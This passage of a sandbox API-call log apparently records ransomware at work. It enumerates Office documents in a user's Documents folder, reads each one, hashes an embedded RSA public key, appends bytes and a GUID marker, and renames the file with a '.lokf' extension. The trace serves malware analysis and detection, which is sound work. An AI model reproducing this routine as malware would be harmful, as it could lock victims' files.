ftCreationTime.dwLowDateTime=0x662fcdf0, ftCreationTime.dwHighDateTime=0x1d5283e, ftLastAccessTime.dwLowDateTime=0xa97b4c40, ftLastAccessTime.dwHighDateTime=0x1d565df, ftLastWriteTime.dwLowDateTime=0xa97b4c40, ftLastWriteTime.dwHighDateTime=0x1d565df, nFileSizeHigh=0x0, nFileSizeLow=0x166bf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uvaDFzE.docx", cAlternateFileName="UVADFZ~1.DOC")) returned 1 [0058.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.945] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.945] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uvaDFzE.docx") returned=".docx" [0058.945] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uvaDFzE.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uvadfze.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.945] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=91839) returned 1 [0058.946] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.947] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x16699, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.947] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.948] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x166bf, lpOverlapped=0x0) returned 1 [0058.948] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.949] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.949] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.949] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.949] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.949] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.949] GetLastError () returned 0x0 [0058.949] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.950] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.950] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.950] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.950] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.950] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.950] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.950] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.951] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x166bf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.951] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.951] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.951] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.951] CloseHandle (hObject=0x5cc) returned 1 [0058.952] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0058.952] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.952] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uvaDFzE.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uvadfze.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\uvaDFzE.docx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\uvadfze.docx.lokf")) returned 1 [0058.953] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70150a40, ftCreationTime.dwHighDateTime=0x1d54e8d, ftLastAccessTime.dwLowDateTime=0x332545c0, ftLastAccessTime.dwHighDateTime=0x1d52497, ftLastWriteTime.dwLowDateTime=0x332545c0, ftLastWriteTime.dwHighDateTime=0x1d52497, nFileSizeHigh=0x0, nFileSizeLow=0xa626, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vShBQE5akxJRPT.pptx", cAlternateFileName="VSHBQE~1.PPT")) returned 1 [0058.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.953] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.953] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vShBQE5akxJRPT.pptx") returned=".pptx" [0058.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vShBQE5akxJRPT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vshbqe5akxjrpt.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.953] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=42534) returned 1 [0058.954] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.955] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.955] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.956] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.956] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa626, lpOverlapped=0x0) returned 1 [0058.956] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.956] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.956] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.956] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.956] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.957] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.957] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.957] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.957] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.957] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.957] GetLastError () returned 0x0 [0058.957] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.957] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.957] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.957] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.957] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.957] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.958] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.958] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.958] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa626, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.958] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.958] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.958] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.958] CloseHandle (hObject=0x5cc) returned 1 [0058.959] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.959] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.959] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vShBQE5akxJRPT.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vshbqe5akxjrpt.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\vShBQE5akxJRPT.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\vshbqe5akxjrpt.pptx.lokf")) returned 1 [0058.961] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66db64a0, ftCreationTime.dwHighDateTime=0x1d530ac, ftLastAccessTime.dwLowDateTime=0xb8a094e0, ftLastAccessTime.dwHighDateTime=0x1d518b0, ftLastWriteTime.dwLowDateTime=0xb8a094e0, ftLastWriteTime.dwHighDateTime=0x1d518b0, nFileSizeHigh=0x0, nFileSizeLow=0x9882, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Xe72pRvBTnt.docx", cAlternateFileName="XE72PR~1.DOC")) returned 1 [0058.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b8c8 [0058.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.961] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xe72pRvBTnt.docx") returned=".docx" [0058.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xe72pRvBTnt.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xe72prvbtnt.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.961] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=39042) returned 1 [0058.961] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.963] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x985c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.963] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.963] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x9882, lpOverlapped=0x0) returned 1 [0058.964] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.964] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.964] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.964] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.964] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.964] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.964] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.965] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.965] GetLastError () returned 0x0 [0058.965] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.965] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.965] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.965] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.965] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.965] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.965] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9882, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.965] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.966] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.966] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.966] CloseHandle (hObject=0x5cc) returned 1 [0058.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.967] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.967] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xe72pRvBTnt.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xe72prvbtnt.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Xe72pRvBTnt.docx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xe72prvbtnt.docx.lokf")) returned 1 [0058.968] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 1 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32699a0 [0058.968] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66556860, ftCreationTime.dwHighDateTime=0x1d4cedb, ftLastAccessTime.dwLowDateTime=0x88c5d230, ftLastAccessTime.dwHighDateTime=0x1d4cbb2, ftLastWriteTime.dwLowDateTime=0x88c5d230, ftLastWriteTime.dwHighDateTime=0x1d4cbb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xw_W- RtiM1Q0r", cAlternateFileName="XW_W-R~1")) returned 0 [0058.968] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0058.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0058.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.968] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0058.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.968] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 